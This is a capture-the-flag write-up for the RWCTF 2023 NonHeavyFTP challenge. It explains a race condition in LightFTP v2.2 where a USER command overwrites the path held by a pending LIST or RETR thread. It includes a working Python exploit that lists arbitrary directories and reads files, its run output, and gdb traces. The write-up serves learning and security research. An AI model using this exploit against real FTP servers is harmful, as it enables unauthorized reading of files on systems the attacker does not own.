RWCTF 2023 NonHeavyFTP writeup

2023-01-09 本文阅读量

A FTP Server pwn chanllenge.


The description of the challenge is shown as below:

Score: 167
Clone-and-Pwn, difficulty:Baby

A non-heavy FTP for you.

# primary
$ nc 2121
# backup
$ nc 2221

Download the attachment of the chanllenge.

$ ls
Dockerfile fftp       fftp.conf

From the Dockfile, we can see that the chanllenge is a open source FTP Server, which is LightFTP v2.2.

wget --no-check-certificate -O

So what we need to do is that download the source code and review the code to find the vulnerability.

The fftp.conf shows that the listen port is 2121, and the user name is anonymous, the password is *, and the access right of the user is readonly.






First of all, let me give you a overview of the code flow for the server. The simple FTP server handles all the client connections in a thread named ftpmain. As shown in below, when a new client comes, it will create the ftp_client_thread thread to handle the connection.

    // Source/ftpserv.c: 1908
		socketret = listen(ftpsocket, SOMAXCONN);
    while ( socketret == 0 ) {
        memset(&laddr, 0, sizeof(laddr));
        asz = sizeof(laddr);
        clientsocket = accept(ftpsocket, (struct sockaddr *)&laddr, &asz);
        if (clientsocket == INVALID_SOCKET)

        rv = -1;
        for (i=0; i<g_cfg.MaxUsers; i++)
            if ( scb[i] == INVALID_SOCKET ) {

                if (g_cfg.EnableKeepalive != 0)

                scb[i] = clientsocket;
                rv = pthread_create(&th, NULL, (void * (*)(void *))ftp_client_thread, &scb[i]);
                if ( rv != 0 )
                    scb[i] = INVALID_SOCKET;


In the handle routine of the ftp_client_thread, it will recieve the command from the client, and find the corresponding handle function for the comand.

        // Source/ftpserv.c: 1781
				while ( ctx.ControlSocket != INVALID_SOCKET ) {
            if ( !recvcmd(&ctx, rcvbuf, sizeof(rcvbuf)) )

            for (c=0; c<MAX_CMDS; c++)
                if (strncasecmp(cmd, ftpprocs[c].Name, cmdlen) == 0)
                    cmdno = c;
                    rv = ftpprocs[c].Proc(&ctx, params);

The command handle table ftpprocs is shown as below, each command has the corresponding function. From here we can know, what we need to do is that check all the command functions and find the vulnerability to read the flag.

static const FTPROUTINE_ENTRY ftpprocs[MAX_CMDS] = {
        {"USER", ftpUSER}, {"QUIT", ftpQUIT}, {"NOOP", ftpNOOP}, {"PWD",  ftpPWD },
        {"TYPE", ftpTYPE}, {"PORT", ftpPORT}, {"LIST", ftpLIST}, {"CDUP", ftpCDUP},
        {"CWD",  ftpCWD }, {"RETR", ftpRETR}, {"ABOR", ftpABOR}, {"DELE", ftpDELE},
        {"PASV", ftpPASV}, {"PASS", ftpPASS}, {"REST", ftpREST}, {"SIZE", ftpSIZE},
        {"MKD",  ftpMKD }, {"RMD",  ftpRMD }, {"STOR", ftpSTOR}, {"SYST", ftpSYST},
        {"FEAT", ftpFEAT}, {"APPE", ftpAPPE}, {"RNFR", ftpRNFR}, {"RNTO", ftpRNTO},
        {"OPTS", ftpOPTS}, {"MLSD", ftpMLSD}, {"AUTH", ftpAUTH}, {"PBSZ", ftpPBSZ},
        {"PROT", ftpPROT}, {"EPSV", ftpEPSV}, {"HELP", ftpHELP}, {"SITE", ftpSITE}

After reading all the code, i found the vulnerability is a rece condition with the usage of the context->FileName variable.

For example, in the LIST command function ftpLIST, it will first call the ftp_effective_path to validate the target directory path, which is no problem.

// Source/ftpserv.c: 541
int ftpLIST(PFTPCONTEXT context, const char *params)
		ftp_effective_path(context->RootDir, context->CurrentDir, params, sizeof(context->FileName), context->FileName);

    while (stat(context->FileName, &filestats) == 0)
        if ( !S_ISDIR(filestats.st_mode) )

        sendstring(context, interm150);
        writelogentry(context, " LIST", (char *)params);
        context->WorkerThreadAbort = 0;


        context->WorkerThreadValid = pthread_create(&tid, NULL, (void * (*)(void *))list_thread, context);

The problem is that the path is stored in context->FileName variable, and after the validation, it creates a thread list_thread to list the file.

As we know about the ftp protocal, when a server is in passive mode, data will be transported with a new socket. As the function create_datasocket shows, the thread will be stucked in the accept function and wait for the client to connect. When the client comes to connect, it will then read the file directory for the context->FileName.

// Source/ftpserv.c: 484
void *list_thread(PFTPCONTEXT context)
    clientsocket = create_datasocket(context);
    while (clientsocket != INVALID_SOCKET)
        if (context->TLS_session != NULL)
            if (!ftp_init_tls_session(&TLS_datasession, clientsocket, 0))

        pdir = opendir(context->FileName);
        if (pdir == NULL)

        while ((entry = readdir(pdir)) != NULL) {
            ret = list_sub(context->FileName, clientsocket, TLS_datasession, entry);
            if ( (ret == 0) || (context->WorkerThreadAbort != 0 ))


// Source ftpserv.c: 101
SOCKET create_datasocket(PFTPCONTEXT context)

    switch ( context->Mode ) {
    case MODE_NORMAL:

    case MODE_PASSIVE:
        asz = sizeof(laddr);
        clientsocket = accept(context->DataSocket, (struct sockaddr *)&laddr, &asz);
        context->DataSocket = clientsocket;

        if ( clientsocket == INVALID_SOCKET )
            return INVALID_SOCKET;

        context->DataIPv4 = 0;
        context->DataPort = 0;
        context->Mode = MODE_NORMAL;

It seems no problem in the list_thread function, but what if we change the value of context->FileName during the the block of the list thread, and then connect to the port to receive the file directory. Isn’t means that the thread will read the directory we put to the context->FileName. The answer is yes, we can change the context->FileName with the function ftpUSER. So this is a race condition vulnerability.

// Source/ftpserv.c: 253
int ftpUSER(PFTPCONTEXT context, const char *params)
    if ( params == NULL )
        return sendstring(context, error501);

    context->Access = FTP_ACCESS_NOT_LOGGED_IN;

    writelogentry(context, " USER: ", (char *)params);
    snprintf(context->FileName, sizeof(context->FileName), "331 User %s OK. Password required\r\n", params);
    sendstring(context, context->FileName);

    /* Save login name to FileName for the next PASS command */
    strcpy(context->FileName, params);
    return 1;

we can make use of this vulnerability to a arbitrary directory traversal vulnerability, the poc is shown as below:

def list_dir(path):
    p = remote(ip, port)
    # step 1 login
    buf = b"USER anonymous"
    sl(p, buf)
    buf = b"PASS *"
    sl(p, buf)
    # step 2, go into passive mode, and get the data port
    buf = b"EPSV"
    sl(p, buf)
    r_port = p.recvuntil(b"|")[:-1].decode()
    print(f"list remote port: {r_port}")
    # step 3, trigger the race condition vulnerability in list function
    buf = b"LIST /"
    sl(p, buf)
    buf = f"USER {path}".encode()  # overwirte the value of context->FilenNme during the block of list thread.
    sl(p, buf)
    p_dir = remote(ip, r_port);
    dir_data = p_dir.recvall().decode() # connect to the data port to read data
    return dir_data

The same with RETR command, there is also a race condition vulnerability in the ftpRETR function, we can make use of it to a arbitrary file read vulnerablity.


If you know the race condition vulnerability, then the exploit is easy. First use the arbitrary directory traversal vulnerability to get the / path file list. From the list we can get the name of the flag. Second use the arbitrary file read vulnerablity read the data of the flag. Boom, pwned.

the exp is shown as below:

if __name__=='__main__':
    dir_data = list_dir("/")
    flag_idx = dir_data.find("flag.")
    flag_path = "/"+dir_data[flag_idx:flag_idx+41]
    print(f"flag path: {flag_path}")
    flag_data = read_file(flag_path)
    print(f"flag: {flag_data}")

The running result is shown as below:

$ python
[+] Opening connection to on port 2121: Done
list remote port: 41092
[+] Opening connection to on port 41092: Done
[+] Receiving all data: Done (1018B)
[*] Closed connection to port 41092
[*] Closed connection to port 2121
flag path: /flag.deb10154-8cb2-11ed-be49-0242ac110002
[+] Opening connection to on port 2121: Done
retr remote port: 42644
[+] Opening connection to on port 42644: Done
[+] Receiving all data: Done (48B)
[*] Closed connection to port 42644
[*] Closed connection to port 2121
flag: rwctf{race-c0nd1tion-1s-real1y_ha4d_pr0blem!!!}

The full exp is in my github.


In this section, i’ll try to debug the vulnerability in gdb to get a deeper understanding of race condition vulnerability and multiple thread debugging.

To debug the server conveniently, we can compile the debug version of the ftp server instead of release version as the dockerfile shows. The commands to compile the debug version are shown as below:

sudo apt-get install -y --no-install-recommends wget unzip gcc make libc6-dev gnutls-dev uuid
cd LightFTP-2.2/Source/Debug

Run gdb with the fftp binary, and debug with the fftp.conf.

gdb fftp
run fftp.conf

After sending LIST / the command, break gdb and start to debug. At this moment, the list_thread will stuck at the create_datasocket function.

As shown below, the 4th thread is stucked at __libc_accept, debug the thread and run with the command thread 4, and bt to check the stack, we can see it’s in the create_datasocket function, and the context address is 0x7ffff4926ba0.

pwndbg> info thread
  Id   Target Id                                Frame
* 1    Thread 0x7ffff7755940 (LWP 91609) "fftp" __GI___libc_read (nbytes=1024, buf=0x555555595770, fd=0) at ../sysdeps/unix/sysv/linux/read.c:26
  2    Thread 0x7ffff7754640 (LWP 91612) "fftp" 0x00007ffff7cbe60f in __libc_accept (fd=3, addr=..., len=0x7ffff7753c0c) at ../sysdeps/unix/sysv/linux/accept.c:26
  3    Thread 0x7ffff492d640 (LWP 91678) "fftp" __libc_recv (flags=<optimized out>, len=4095, buf=0x7ffff492bc40, fd=4) at ../sysdeps/unix/sysv/linux/recv.c:28
  4    Thread 0x7fffeffff640 (LWP 91679) "fftp" 0x00007ffff7cbe60f in __libc_accept (fd=6, addr=..., len=0x7fffefffeb58) at ../sysdeps/unix/sysv/linux/accept.c:26
pwndbg> thread 4
pwndbg> bt
#0  0x00007ffff7cbe60f in __libc_accept (fd=6, addr=..., len=0x7fffefffeb58) at ../sysdeps/unix/sysv/linux/accept.c:26
#1  0x0000555555558a4c in create_datasocket (context=0x7ffff4926ba0) at ../ftpserv.c:127
#2  0x00005555555599f1 in list_thread (context=0x7ffff4926ba0) at ../ftpserv.c:497
#3  0x00007ffff7c2bb43 in start_thread (arg=<optimized out>) at ./nptl/pthread_create.c:442
#4  0x00007ffff7cbda00 in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81

The context->FileName is at the offset of 0x3078 of context, so let’s check the value of context->FileName, we can see it’s still /server/data now.

pwndbg> x/s 0x7ffff4926ba0+0x3078
0x7ffff4929c18: "/server/data"

And then send out the overwirte command USER /, check the value again, we can see it has been changed to /, boom, pwned.

pwndbg> x/s 0x7ffff4926ba0+0x3078                                                                             
0x7ffff4929c18: "/"


Fun game, learned a lot from the game.